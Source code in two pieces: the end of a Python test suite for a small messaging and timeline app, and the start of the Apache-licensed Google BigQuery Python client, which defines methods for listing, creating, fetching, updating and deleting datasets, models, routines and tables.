assert self.message3 > self.message2
class TestMoreMessages(TestHandmadeData):
def test_create_one_message(self):
new_message = temp.Message(self.user2, "M4: In reply to M3", in_reply_to=self.message3.uuid)
new_message.created = new_message.created + datetime.timedelta(seconds=10)
new_message.post()
assert len(temp.Timeline().generate_timeline(self.user1)) == 3
assert len(temp.Timeline().generate_timeline(self.user2)) == 0
assert len(temp.Timeline().generate_timeline(self.user3)) == 0
class TestCircularConnection(TestHandmadeData):
from collections import defaultdict
temp.Storage().subscription_list = defaultdict(set)
temp.Storage().followers_back_list = defaultdict(set)
def test_circular_follow_timeline(self):
# Let's start with following self
self.user2.subscribe_to(self.user2)
assert temp.Timeline().generate_timeline(self.user3) == []
self.user3.subscribe_to(self.user3)
assert temp.Timeline().generate_timeline(self.user3) == []
def test_circular_connection_for_user2(self):
self.user3.subscribe_to(self.user2)
assert len(temp.Timeline().generate_timeline(self.user1)) == 2
assert len(temp.Timeline().generate_timeline(self.user2)) == 0
assert len(temp.Timeline().generate_timeline(self.user3)) == 2
def test_circular_connection_for_user3(self):
self.user3.subscribe_to(self.user1)
self.user3.subscribe_to(self.user2)
assert len(temp.Timeline().generate_timeline(self.user1)) == 2
assert len(temp.Timeline().generate_timeline(self.user2)) == 0
assert len(temp.Timeline().generate_timeline(self.user3)) == 3
def test_case_for_user2(self):
self.user2.subscribe_to(self.user1)
assert len(temp.Timeline().generate_timeline(self.user1)) == 2
assert len(temp.Timeline().generate_timeline(self.user2)) == 1
assert len(temp.Timeline().generate_timeline(self.user3)) == 3
def test_clear(self):
self.user3.subscribe_to(self.user1)
self.user3.subscribe_to(self.user2)
assert len(temp.Timeline().generate_timeline(self.user3)) == 3
class TestAPIOnHandmadeData:
def setup(self):
"""Runs once per class"""
temp.Storage().clear()
self.user1 = temp.User().create()
self.user4 = temp.User().create()
self.message1 = temp.Messaging().post("test", self.user1.uuid)
self.message2 = temp.Messaging().post("test", self.user1.uuid, in_reply_to_uuid=self.message1.uuid)
def test_post(self):
assert self.message1.uuid in temp.Storage().messages_list
assert self.message2.uuid in temp.Storage().messages_list
assert len(temp.Storage().messages_list) == 2
def test_no_follower(self):
assert not any(temp.Storage().subscription_list.values())
assert not any(temp.Storage().followers_back_list.values())
def test_follower(self):
temp.Messaging().follow(who=self.user4.uuid, subscribe_to=self.user1.uuid)
assert self.user1.uuid in temp.Storage().subscription_list[self.user4.uuid]
assert self.user4.uuid in temp.Storage().followers_back_list[self.user1.uuid]
def test_unfollow(self):
temp.Messaging().follow(who=self.user4.uuid, subscribe_to=self.user1.uuid)
temp.Messaging().unfollow(who=self.user4.uuid, subscribe_to=self.user1.uuid)
assert not any(temp.Storage().subscription_list.values())
assert not any(temp.Storage().followers_back_list.values())
|
the-stack_106_16856
|
# Copyright 2015 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Client for interacting with the Google BigQuery API."""
from __future__ import absolute_import
try:
from collections import abc as collections_abc
except ImportError: # Python 2.7
import collections as collections_abc
import functools
import gzip
import io
import json
import os
import tempfile
import uuid
import warnings
try:
import pyarrow
except ImportError: # pragma: NO COVER
pyarrow = None
import six
from google import resumable_media
from google.resumable_media.requests import MultipartUpload
from google.resumable_media.requests import ResumableUpload
import google.api_core.exceptions
from google.api_core import page_iterator
import google.cloud._helpers
from google.cloud import exceptions
from google.cloud.client import ClientWithProject
from google.cloud.bigquery._helpers import _record_field_to_json
from google.cloud.bigquery._helpers import _str_or_none
from google.cloud.bigquery._http import Connection
from google.cloud.bigquery import _pandas_helpers
from google.cloud.bigquery.dataset import Dataset
from google.cloud.bigquery.dataset import DatasetListItem
from google.cloud.bigquery.dataset import DatasetReference
from google.cloud.bigquery import job
from google.cloud.bigquery.model import Model
from google.cloud.bigquery.model import ModelReference
from google.cloud.bigquery.query import _QueryResults
from google.cloud.bigquery.retry import DEFAULT_RETRY
from google.cloud.bigquery.routine import Routine
from google.cloud.bigquery.routine import RoutineReference
from google.cloud.bigquery.schema import SchemaField
from google.cloud.bigquery.table import _table_arg_to_table
from google.cloud.bigquery.table import _table_arg_to_table_ref
from google.cloud.bigquery.table import Table
from google.cloud.bigquery.table import TableListItem
from google.cloud.bigquery.table import TableReference
from google.cloud.bigquery.table import RowIterator
_DEFAULT_CHUNKSIZE = 1048576 # 1024 * 1024 B = 1 MB
_MAX_MULTIPART_SIZE = 5 * 1024 * 1024
_DEFAULT_NUM_RETRIES = 6
_BASE_UPLOAD_TEMPLATE = (
u"https://www.googleapis.com/upload/bigquery/v2/projects/"
u"{project}/jobs?uploadType="
)
_MULTIPART_URL_TEMPLATE = _BASE_UPLOAD_TEMPLATE + u"multipart"
_RESUMABLE_URL_TEMPLATE = _BASE_UPLOAD_TEMPLATE + u"resumable"
_GENERIC_CONTENT_TYPE = u"*/*"
_READ_LESS_THAN_SIZE = (
"Size {:d} was specified but the file-like object only had " "{:d} bytes remaining."
)
_NEED_TABLE_ARGUMENT = (
"The table argument should be a table ID string, Table, or TableReference"
)
class Project(object):
"""Wrapper for resource describing a BigQuery project.
:type project_id: str
:param project_id: Opaque ID of the project
:type numeric_id: int
:param numeric_id: Numeric ID of the project
:type friendly_name: str
:param friendly_name: Display name of the project
"""
def __init__(self, project_id, numeric_id, friendly_name):
self.project_id = project_id
self.numeric_id = numeric_id
self.friendly_name = friendly_name
@classmethod
def from_api_repr(cls, resource):
"""Factory: construct an instance from a resource dict."""
return cls(resource["id"], resource["numericId"], resource["friendlyName"])
class Client(ClientWithProject):
"""Client to bundle configuration needed for API requests.
Args:
project (str):
Project ID for the project which the client acts on behalf of.
Will be passed when creating a dataset / job. If not passed,
falls back to the default inferred from the environment.
credentials (google.auth.credentials.Credentials):
(Optional) The OAuth2 Credentials to use for this client. If not
passed (and if no ``_http`` object is passed), falls back to the
default inferred from the environment.
_http (requests.Session):
(Optional) HTTP object to make requests. Can be any object that
defines ``request()`` with the same interface as
:meth:`requests.Session.request`. If not passed, an ``_http``
object is created that is bound to the ``credentials`` for the
current object.
This parameter should be considered private, and could change in
the future.
location (str):
(Optional) Default location for jobs / datasets / tables.
default_query_job_config (google.cloud.bigquery.job.QueryJobConfig):
(Optional) Default ``QueryJobConfig``.
Will be merged into job configs passed into the ``query`` method.
client_info (google.api_core.client_info.ClientInfo):
The client info used to send a user-agent string along with API
requests. If ``None``, then default info will be used. Generally,
you only need to set this if you're developing your own library
or partner tool.
Raises:
google.auth.exceptions.DefaultCredentialsError:
Raised if ``credentials`` is not specified and the library fails
to acquire default credentials.
"""
SCOPE = (
"https://www.googleapis.com/auth/bigquery",
"https://www.googleapis.com/auth/cloud-platform",
)
"""The scopes required for authenticating as a BigQuery consumer."""
def __init__(
self,
project=None,
credentials=None,
_http=None,
location=None,
default_query_job_config=None,
client_info=None,
):
super(Client, self).__init__(
project=project, credentials=credentials, _http=_http
)
self._connection = Connection(self, client_info=client_info)
self._location = location
self._default_query_job_config = default_query_job_config
@property
def location(self):
"""Default location for jobs / datasets / tables."""
return self._location
def get_service_account_email(self, project=None):
"""Get the email address of the project's BigQuery service account
Note:
This is the service account that BigQuery uses to manage tables
encrypted by a key in KMS.
Args:
project (str, optional):
Project ID to use for retreiving service account email.
Defaults to the client's project.
Returns:
str: service account email address
Example:
>>> from google.cloud import bigquery
>>> client = bigquery.Client()
>>> client.get_service_account_email()
[email protected]
"""
if project is None:
project = self.project
path = "/projects/%s/serviceAccount" % (project,)
api_response = self._connection.api_request(method="GET", path=path)
return api_response["email"]
def list_projects(self, max_results=None, page_token=None, retry=DEFAULT_RETRY):
"""List projects for the project associated with this client.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/projects/list
:type max_results: int
:param max_results: (Optional) maximum number of projects to return,
If not passed, defaults to a value set by the API.
:type page_token: str
:param page_token:
(Optional) Token representing a cursor into the projects. If
not passed, the API will return the first page of projects.
The token marks the beginning of the iterator to be returned
and the value of the ``page_token`` can be accessed at
``next_page_token`` of the
:class:`~google.api_core.page_iterator.HTTPIterator`.
:type retry: :class:`google.api_core.retry.Retry`
:param retry: (Optional) How to retry the RPC.
:rtype: :class:`~google.api_core.page_iterator.Iterator`
:returns: Iterator of :class:`~google.cloud.bigquery.client.Project`
accessible to the current client.
"""
return page_iterator.HTTPIterator(
client=self,
api_request=functools.partial(self._call_api, retry),
path="/projects",
item_to_value=_item_to_project,
items_key="projects",
page_token=page_token,
max_results=max_results,
)
def list_datasets(
self,
project=None,
include_all=False,
filter=None,
max_results=None,
page_token=None,
retry=DEFAULT_RETRY,
):
"""List datasets for the project associated with this client.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/datasets/list
Args:
project (str):
Optional. Project ID to use for retreiving datasets. Defaults
to the client's project.
include_all (bool):
Optional. True if results include hidden datasets. Defaults
to False.
filter (str):
Optional. An expression for filtering the results by label.
For syntax, see
https://cloud.google.com/bigquery/docs/reference/rest/v2/datasets/list#filter.
max_results (int):
Optional. Maximum number of datasets to return.
page_token (str):
Optional. Token representing a cursor into the datasets. If
not passed, the API will return the first page of datasets.
The token marks the beginning of the iterator to be returned
and the value of the ``page_token`` can be accessed at
``next_page_token`` of the
:class:`~google.api_core.page_iterator.HTTPIterator`.
retry (google.api_core.retry.Retry):
Optional. How to retry the RPC.
Returns:
google.api_core.page_iterator.Iterator:
Iterator of
:class:`~google.cloud.bigquery.dataset.DatasetListItem`.
associated with the project.
"""
extra_params = {}
if project is None:
project = self.project
if include_all:
extra_params["all"] = True
if filter:
# TODO: consider supporting a dict of label -> value for filter,
# and converting it into a string here.
extra_params["filter"] = filter
path = "/projects/%s/datasets" % (project,)
return page_iterator.HTTPIterator(
client=self,
api_request=functools.partial(self._call_api, retry),
path=path,
item_to_value=_item_to_dataset,
items_key="datasets",
page_token=page_token,
max_results=max_results,
extra_params=extra_params,
)
def dataset(self, dataset_id, project=None):
"""Construct a reference to a dataset.
:type dataset_id: str
:param dataset_id: ID of the dataset.
:type project: str
:param project: (Optional) project ID for the dataset (defaults to
the project of the client).
:rtype: :class:`google.cloud.bigquery.dataset.DatasetReference`
:returns: a new ``DatasetReference`` instance
"""
if project is None:
project = self.project
return DatasetReference(project, dataset_id)
def create_dataset(self, dataset, exists_ok=False, retry=DEFAULT_RETRY):
"""API call: create the dataset via a POST request.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/tables/insert
Args:
dataset (Union[ \
:class:`~google.cloud.bigquery.dataset.Dataset`, \
:class:`~google.cloud.bigquery.dataset.DatasetReference`, \
str, \
]):
A :class:`~google.cloud.bigquery.dataset.Dataset` to create.
If ``dataset`` is a reference, an empty dataset is created
with the specified ID and client's default location.
exists_ok (bool):
Defaults to ``False``. If ``True``, ignore "already exists"
errors when creating the dataset.
retry (google.api_core.retry.Retry):
Optional. How to retry the RPC.
Returns:
google.cloud.bigquery.dataset.Dataset:
A new ``Dataset`` returned from the API.
Example:
>>> from google.cloud import bigquery
>>> client = bigquery.Client()
>>> dataset = bigquery.Dataset(client.dataset('my_dataset'))
>>> dataset = client.create_dataset(dataset)
"""
if isinstance(dataset, str):
dataset = DatasetReference.from_string(
dataset, default_project=self.project
)
if isinstance(dataset, DatasetReference):
dataset = Dataset(dataset)
path = "/projects/%s/datasets" % (dataset.project,)
data = dataset.to_api_repr()
if data.get("location") is None and self.location is not None:
data["location"] = self.location
try:
api_response = self._call_api(retry, method="POST", path=path, data=data)
return Dataset.from_api_repr(api_response)
except google.api_core.exceptions.Conflict:
if not exists_ok:
raise
return self.get_dataset(dataset.reference, retry=retry)
def create_routine(self, routine, exists_ok=False, retry=DEFAULT_RETRY):
"""[Beta] Create a routine via a POST request.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/routines/insert
Args:
routine (:class:`~google.cloud.bigquery.routine.Routine`):
A :class:`~google.cloud.bigquery.routine.Routine` to create.
The dataset that the routine belongs to must already exist.
exists_ok (bool):
Defaults to ``False``. If ``True``, ignore "already exists"
errors when creating the routine.
retry (google.api_core.retry.Retry):
Optional. How to retry the RPC.
Returns:
google.cloud.bigquery.routine.Routine:
A new ``Routine`` returned from the service.
"""
reference = routine.reference
path = "/projects/{}/datasets/{}/routines".format(
reference.project, reference.dataset_id
)
resource = routine.to_api_repr()
try:
api_response = self._call_api(
retry, method="POST", path=path, data=resource
)
return Routine.from_api_repr(api_response)
except google.api_core.exceptions.Conflict:
if not exists_ok:
raise
return self.get_routine(routine.reference, retry=retry)
def create_table(self, table, exists_ok=False, retry=DEFAULT_RETRY):
"""API call: create a table via a PUT request
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/tables/insert
Args:
table (Union[ \
:class:`~google.cloud.bigquery.table.Table`, \
:class:`~google.cloud.bigquery.table.TableReference`, \
str, \
]):
A :class:`~google.cloud.bigquery.table.Table` to create.
If ``table`` is a reference, an empty table is created
with the specified ID. The dataset that the table belongs to
must already exist.
exists_ok (bool):
Defaults to ``False``. If ``True``, ignore "already exists"
errors when creating the table.
retry (google.api_core.retry.Retry):
Optional. How to retry the RPC.
Returns:
google.cloud.bigquery.table.Table:
A new ``Table`` returned from the service.
"""
table = _table_arg_to_table(table, default_project=self.project)
path = "/projects/%s/datasets/%s/tables" % (table.project, table.dataset_id)
data = table.to_api_repr()
try:
api_response = self._call_api(retry, method="POST", path=path, data=data)
return Table.from_api_repr(api_response)
except google.api_core.exceptions.Conflict:
if not exists_ok:
raise
return self.get_table(table.reference, retry=retry)
def _call_api(self, retry, **kwargs):
call = functools.partial(self._connection.api_request, **kwargs)
if retry:
call = retry(call)
return call()
def get_dataset(self, dataset_ref, retry=DEFAULT_RETRY):
"""Fetch the dataset referenced by ``dataset_ref``
Args:
dataset_ref (Union[ \
:class:`~google.cloud.bigquery.dataset.DatasetReference`, \
str, \
]):
A reference to the dataset to fetch from the BigQuery API.
If a string is passed in, this method attempts to create a
dataset reference from a string using
:func:`~google.cloud.bigquery.dataset.DatasetReference.from_string`.
retry (:class:`google.api_core.retry.Retry`):
(Optional) How to retry the RPC.
Returns:
google.cloud.bigquery.dataset.Dataset:
A ``Dataset`` instance.
"""
if isinstance(dataset_ref, str):
dataset_ref = DatasetReference.from_string(
dataset_ref, default_project=self.project
)
api_response = self._call_api(retry, method="GET", path=dataset_ref.path)
return Dataset.from_api_repr(api_response)
def get_model(self, model_ref, retry=DEFAULT_RETRY):
"""[Beta] Fetch the model referenced by ``model_ref``.
Args:
model_ref (Union[ \
:class:`~google.cloud.bigquery.model.ModelReference`, \
str, \
]):
A reference to the model to fetch from the BigQuery API.
If a string is passed in, this method attempts to create a
model reference from a string using
:func:`google.cloud.bigquery.model.ModelReference.from_string`.
retry (:class:`google.api_core.retry.Retry`):
(Optional) How to retry the RPC.
Returns:
google.cloud.bigquery.model.Model:
A ``Model`` instance.
"""
if isinstance(model_ref, str):
model_ref = ModelReference.from_string(
model_ref, default_project=self.project
)
api_response = self._call_api(retry, method="GET", path=model_ref.path)
return Model.from_api_repr(api_response)
def get_routine(self, routine_ref, retry=DEFAULT_RETRY):
"""[Beta] Get the routine referenced by ``routine_ref``.
Args:
routine_ref (Union[ \
:class:`~google.cloud.bigquery.routine.Routine`, \
:class:`~google.cloud.bigquery.routine.RoutineReference`, \
str, \
]):
A reference to the routine to fetch from the BigQuery API. If
a string is passed in, this method attempts to create a
reference from a string using
:func:`google.cloud.bigquery.routine.RoutineReference.from_string`.
retry (:class:`google.api_core.retry.Retry`):
(Optional) How to retry the API call.
Returns:
google.cloud.bigquery.routine.Routine:
A ``Routine`` instance.
"""
if isinstance(routine_ref, str):
routine_ref = RoutineReference.from_string(
routine_ref, default_project=self.project
)
api_response = self._call_api(retry, method="GET", path=routine_ref.path)
return Routine.from_api_repr(api_response)
def get_table(self, table, retry=DEFAULT_RETRY):
"""Fetch the table referenced by ``table``.
Args:
table (Union[ \
:class:`~google.cloud.bigquery.table.Table`, \
:class:`~google.cloud.bigquery.table.TableReference`, \
str, \
]):
A reference to the table to fetch from the BigQuery API.
If a string is passed in, this method attempts to create a
table reference from a string using
:func:`google.cloud.bigquery.table.TableReference.from_string`.
retry (:class:`google.api_core.retry.Retry`):
(Optional) How to retry the RPC.
Returns:
google.cloud.bigquery.table.Table:
A ``Table`` instance.
"""
table_ref = _table_arg_to_table_ref(table, default_project=self.project)
api_response = self._call_api(retry, method="GET", path=table_ref.path)
return Table.from_api_repr(api_response)
def update_dataset(self, dataset, fields, retry=DEFAULT_RETRY):
"""Change some fields of a dataset.
Use ``fields`` to specify which fields to update. At least one field
must be provided. If a field is listed in ``fields`` and is ``None`` in
``dataset``, it will be deleted.
If ``dataset.etag`` is not ``None``, the update will only
succeed if the dataset on the server has the same ETag. Thus
reading a dataset with ``get_dataset``, changing its fields,
and then passing it to ``update_dataset`` will ensure that the changes
will only be saved if no modifications to the dataset occurred
since the read.
Args:
dataset (google.cloud.bigquery.dataset.Dataset):
The dataset to update.
fields (Sequence[str]):
The properties of ``dataset`` to change (e.g. "friendly_name").
retry (google.api_core.retry.Retry, optional):
How to retry the RPC.
Returns:
google.cloud.bigquery.dataset.Dataset:
The modified ``Dataset`` instance.
"""
partial = dataset._build_resource(fields)
if dataset.etag is not None:
headers = {"If-Match": dataset.etag}
else:
headers = None
api_response = self._call_api(
retry, method="PATCH", path=dataset.path, data=partial, headers=headers
)
return Dataset.from_api_repr(api_response)
def update_model(self, model, fields, retry=DEFAULT_RETRY):
"""[Beta] Change some fields of a model.
Use ``fields`` to specify which fields to update. At least one field
must be provided. If a field is listed in ``fields`` and is ``None``
in ``model``, the field value will be deleted.
If ``model.etag`` is not ``None``, the update will only succeed if
the model on the server has the same ETag. Thus reading a model with
``get_model``, changing its fields, and then passing it to
``update_model`` will ensure that the changes will only be saved if
no modifications to the model occurred since the read.
Args:
model (google.cloud.bigquery.model.Model): The model to update.
fields (Sequence[str]):
The fields of ``model`` to change, spelled as the Model
properties (e.g. "friendly_name").
retry (google.api_core.retry.Retry):
(Optional) A description of how to retry the API call.
Returns:
google.cloud.bigquery.model.Model:
The model resource returned from the API call.
"""
partial = model._build_resource(fields)
if model.etag:
headers = {"If-Match": model.etag}
else:
headers = None
api_response = self._call_api(
retry, method="PATCH", path=model.path, data=partial, headers=headers
)
return Model.from_api_repr(api_response)
def update_routine(self, routine, fields, retry=DEFAULT_RETRY):
"""[Beta] Change some fields of a routine.
Use ``fields`` to specify which fields to update. At least one field
must be provided. If a field is listed in ``fields`` and is ``None``
in ``routine``, the field value will be deleted.
.. warning::
During beta, partial updates are not supported. You must provide
all fields in the resource.
If :attr:`~google.cloud.bigquery.routine.Routine.etag` is not
``None``, the update will only succeed if the resource on the server
has the same ETag. Thus reading a routine with
:func:`~google.cloud.bigquery.client.Client.get_routine`, changing
its fields, and then passing it to this method will ensure that the
changes will only be saved if no modifications to the resource
occurred since the read.
Args:
routine (google.cloud.bigquery.routine.Routine): The routine to update.
fields (Sequence[str]):
The fields of ``routine`` to change, spelled as the
:class:`~google.cloud.bigquery.routine.Routine` properties
(e.g. ``type_``).
retry (google.api_core.retry.Retry):
(Optional) A description of how to retry the API call.
Returns:
google.cloud.bigquery.routine.Routine:
The routine resource returned from the API call.
"""
partial = routine._build_resource(fields)
if routine.etag:
headers = {"If-Match": routine.etag}
else:
headers = None
# TODO: remove when routines update supports partial requests.
partial["routineReference"] = routine.reference.to_api_repr()
api_response = self._call_api(
retry, method="PUT", path=routine.path, data=partial, headers=headers
)
return Routine.from_api_repr(api_response)
def update_table(self, table, fields, retry=DEFAULT_RETRY):
"""Change some fields of a table.
Use ``fields`` to specify which fields to update. At least one field
must be provided. If a field is listed in ``fields`` and is ``None``
in ``table``, the field value will be deleted.
If ``table.etag`` is not ``None``, the update will only succeed if
the table on the server has the same ETag. Thus reading a table with
``get_table``, changing its fields, and then passing it to
``update_table`` will ensure that the changes will only be saved if
no modifications to the table occurred since the read.
Args:
table (google.cloud.bigquery.table.Table): The table to update.
fields (Sequence[str]):
The fields of ``table`` to change, spelled as the Table
properties (e.g. "friendly_name").
retry (google.api_core.retry.Retry):
(Optional) A description of how to retry the API call.
Returns:
google.cloud.bigquery.table.Table:
The table resource returned from the API call.
"""
partial = table._build_resource(fields)
if table.etag is not None:
headers = {"If-Match": table.etag}
else:
headers = None
api_response = self._call_api(
retry, method="PATCH", path=table.path, data=partial, headers=headers
)
return Table.from_api_repr(api_response)
def list_models(
self, dataset, max_results=None, page_token=None, retry=DEFAULT_RETRY
):
"""[Beta] List models in the dataset.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/models/list
Args:
dataset (Union[ \
:class:`~google.cloud.bigquery.dataset.Dataset`, \
:class:`~google.cloud.bigquery.dataset.DatasetReference`, \
str, \
]):
A reference to the dataset whose models to list from the
BigQuery API. If a string is passed in, this method attempts
to create a dataset reference from a string using
:func:`google.cloud.bigquery.dataset.DatasetReference.from_string`.
max_results (int):
(Optional) Maximum number of models to return. If not passed,
defaults to a value set by the API.
page_token (str):
(Optional) Token representing a cursor into the models. If
not passed, the API will return the first page of models. The
token marks the beginning of the iterator to be returned and
the value of the ``page_token`` can be accessed at
``next_page_token`` of the
:class:`~google.api_core.page_iterator.HTTPIterator`.
retry (:class:`google.api_core.retry.Retry`):
(Optional) How to retry the RPC.
Returns:
google.api_core.page_iterator.Iterator:
Iterator of
:class:`~google.cloud.bigquery.model.Model` contained
within the requested dataset.
"""
if isinstance(dataset, str):
dataset = DatasetReference.from_string(
dataset, default_project=self.project
)
if not isinstance(dataset, (Dataset, DatasetReference)):
raise TypeError("dataset must be a Dataset, DatasetReference, or string")
path = "%s/models" % dataset.path
result = page_iterator.HTTPIterator(
client=self,
api_request=functools.partial(self._call_api, retry),
path=path,
item_to_value=_item_to_model,
items_key="models",
page_token=page_token,
max_results=max_results,
)
result.dataset = dataset
return result
def list_routines(
self, dataset, max_results=None, page_token=None, retry=DEFAULT_RETRY
):
"""[Beta] List routines in the dataset.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/routines/list
Args:
dataset (Union[ \
:class:`~google.cloud.bigquery.dataset.Dataset`, \
:class:`~google.cloud.bigquery.dataset.DatasetReference`, \
str, \
]):
A reference to the dataset whose routines to list from the
BigQuery API. If a string is passed in, this method attempts
to create a dataset reference from a string using
:func:`google.cloud.bigquery.dataset.DatasetReference.from_string`.
max_results (int):
(Optional) Maximum number of routines to return. If not passed,
defaults to a value set by the API.
page_token (str):
(Optional) Token representing a cursor into the routines. If
not passed, the API will return the first page of routines. The
token marks the beginning of the iterator to be returned and
the value of the ``page_token`` can be accessed at
``next_page_token`` of the
:class:`~google.api_core.page_iterator.HTTPIterator`.
retry (:class:`google.api_core.retry.Retry`):
(Optional) How to retry the RPC.
Returns:
google.api_core.page_iterator.Iterator:
Iterator of all
:class:`~google.cloud.bigquery.routine.Routine`s contained
within the requested dataset, limited by ``max_results``.
"""
if isinstance(dataset, str):
dataset = DatasetReference.from_string(
dataset, default_project=self.project
)
if not isinstance(dataset, (Dataset, DatasetReference)):
raise TypeError("dataset must be a Dataset, DatasetReference, or string")
path = "{}/routines".format(dataset.path)
result = page_iterator.HTTPIterator(
client=self,
api_request=functools.partial(self._call_api, retry),
path=path,
item_to_value=_item_to_routine,
items_key="routines",
page_token=page_token,
max_results=max_results,
)
result.dataset = dataset
return result
def list_tables(
self, dataset, max_results=None, page_token=None, retry=DEFAULT_RETRY
):
"""List tables in the dataset.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/tables/list
Args:
dataset (Union[ \
:class:`~google.cloud.bigquery.dataset.Dataset`, \
:class:`~google.cloud.bigquery.dataset.DatasetReference`, \
str, \
]):
A reference to the dataset whose tables to list from the
BigQuery API. If a string is passed in, this method attempts
to create a dataset reference from a string using
:func:`google.cloud.bigquery.dataset.DatasetReference.from_string`.
max_results (int):
(Optional) Maximum number of tables to return. If not passed,
defaults to a value set by the API.
page_token (str):
(Optional) Token representing a cursor into the tables. If
not passed, the API will return the first page of tables. The
token marks the beginning of the iterator to be returned and
the value of the ``page_token`` can be accessed at
``next_page_token`` of the
:class:`~google.api_core.page_iterator.HTTPIterator`.
retry (:class:`google.api_core.retry.Retry`):
(Optional) How to retry the RPC.
Returns:
google.api_core.page_iterator.Iterator:
Iterator of
:class:`~google.cloud.bigquery.table.TableListItem` contained
within the requested dataset.
"""
if isinstance(dataset, str):
dataset = DatasetReference.from_string(
dataset, default_project=self.project
)
if not isinstance(dataset, (Dataset, DatasetReference)):
raise TypeError("dataset must be a Dataset, DatasetReference, or string")
path = "%s/tables" % dataset.path
result = page_iterator.HTTPIterator(
client=self,
api_request=functools.partial(self._call_api, retry),
path=path,
item_to_value=_item_to_table,
items_key="tables",
page_token=page_token,
max_results=max_results,
)
result.dataset = dataset
return result
def delete_dataset(
self, dataset, delete_contents=False, retry=DEFAULT_RETRY, not_found_ok=False
):
"""Delete a dataset.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/datasets/delete
Args
dataset (Union[ \
:class:`~google.cloud.bigquery.dataset.Dataset`, \
:class:`~google.cloud.bigquery.dataset.DatasetReference`, \
str, \
]):
A reference to the dataset to delete. If a string is passed
in, this method attempts to create a dataset reference from a
string using
:func:`google.cloud.bigquery.dataset.DatasetReference.from_string`.
delete_contents (boolean):
(Optional) If True, delete all the tables in the dataset. If
False and the dataset contains tables, the request will fail.
Default is False.
retry (:class:`google.api_core.retry.Retry`):
(Optional) How to retry the RPC.
not_found_ok (bool):
Defaults to ``False``. If ``True``, ignore "not found" errors
when deleting the dataset.
"""
if isinstance(dataset, str):
dataset = DatasetReference.from_string(
dataset, default_project=self.project
)
if not isinstance(dataset, (Dataset, DatasetReference)):
raise TypeError("dataset must be a Dataset or a DatasetReference")
params = {}
if delete_contents:
params["deleteContents"] = "true"
try:
self._call_api(
retry, method="DELETE", path=dataset.path, query_params=params
)
except google.api_core.exceptions.NotFound:
if not not_found_ok:
raise
def delete_model(self, model, retry=DEFAULT_RETRY, not_found_ok=False):
"""[Beta] Delete a model
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/models/delete
Args:
model (Union[ \
:class:`~google.cloud.bigquery.model.Model`, \
:class:`~google.cloud.bigquery.model.ModelReference`, \
str, \
]):
A reference to the model to delete. If a string is passed in,
this method attempts to create a model reference from a
string using
:func:`google.cloud.bigquery.model.ModelReference.from_string`.
retry (:class:`google.api_core.retry.Retry`):
(Optional) How to retry the RPC.
not_found_ok (bool):
Defaults to ``False``. If ``True``, ignore "not found" errors
when deleting the model.
"""
if isinstance(model, str):
model = ModelReference.from_string(model, default_project=self.project)
if not isinstance(model, (Model, ModelReference)):
raise TypeError("model must be a Model or a ModelReference")
try:
self._call_api(retry, method="DELETE", path=model.path)
except google.api_core.exceptions.NotFound:
if not not_found_ok:
raise
def delete_routine(self, routine, retry=DEFAULT_RETRY, not_found_ok=False):
"""[Beta] Delete a routine.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/routines/delete
Args:
model (Union[ \
:class:`~google.cloud.bigquery.routine.Routine`, \
:class:`~google.cloud.bigquery.routine.RoutineReference`, \
str, \
]):
A reference to the routine to delete. If a string is passed
in, this method attempts to create a routine reference from a
string using
:func:`google.cloud.bigquery.routine.RoutineReference.from_string`.
retry (:class:`google.api_core.retry.Retry`):
(Optional) How to retry the RPC.
not_found_ok (bool):
Defaults to ``False``. If ``True``, ignore "not found" errors
when deleting the routine.
"""
if isinstance(routine, str):
routine = RoutineReference.from_string(
routine, default_project=self.project
)
if not isinstance(routine, (Routine, RoutineReference)):
raise TypeError("routine must be a Routine or a RoutineReference")
try:
self._call_api(retry, method="DELETE", path=routine.path)
except google.api_core.exceptions.NotFound:
if not not_found_ok:
raise
def delete_table(self, table, retry=DEFAULT_RETRY, not_found_ok=False):
"""Delete a table
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/tables/delete
Args:
table (Union[ \
:class:`~google.cloud.bigquery.table.Table`, \
:class:`~google.cloud.bigquery.table.TableReference`, \
str, \
]):
A reference to the table to delete. If a string is passed in,
this method attempts to create a table reference from a
string using
:func:`google.cloud.bigquery.table.TableReference.from_string`.
retry (:class:`google.api_core.retry.Retry`):
(Optional) How to retry the RPC.
not_found_ok (bool):
Defaults to ``False``. If ``True``, ignore "not found" errors
when deleting the table.
"""
table = _table_arg_to_table_ref(table, default_project=self.project)
if not isinstance(table, TableReference):
raise TypeError("Unable to get TableReference for table '{}'".format(table))
try:
self._call_api(retry, method="DELETE", path=table.path)
except google.api_core.exceptions.NotFound:
if not not_found_ok:
raise
def _get_query_results(
self, job_id, retry, project=None, timeout_ms=None, location=None
):
"""Get the query results object for a query job.
Arguments:
job_id (str): Name of the query job.
retry (google.api_core.retry.Retry):
(Optional) How to retry the RPC.
project (str):
(Optional) project ID for the query job (defaults to the
project of the client).
timeout_ms (int):
(Optional) number of milliseconds the the API call should
wait for the query to complete before the request times out.
location (str): Location of the query job.
Returns:
google.cloud.bigquery.query._QueryResults:
A new ``_QueryResults`` instance.
"""
extra_params = {"maxResults": 0}
if project is None:
project = self.project
if timeout_ms is not None:
extra_params["timeoutMs"] = timeout_ms
if location is None:
location = self.location
if location is not None:
extra_params["location"] = location
path = "/projects/{}/queries/{}".format(project, job_id)
# This call is typically made in a polling loop that checks whether the
# job is complete (from QueryJob.done(), called ultimately from
# QueryJob.result()). So we don't need to poll here.
resource = self._call_api(
retry, method="GET", path=path, query_params=extra_params
)
return _QueryResults.from_api_repr(resource)
def job_from_resource(self, resource):
"""Detect correct job type from resource and instantiate.
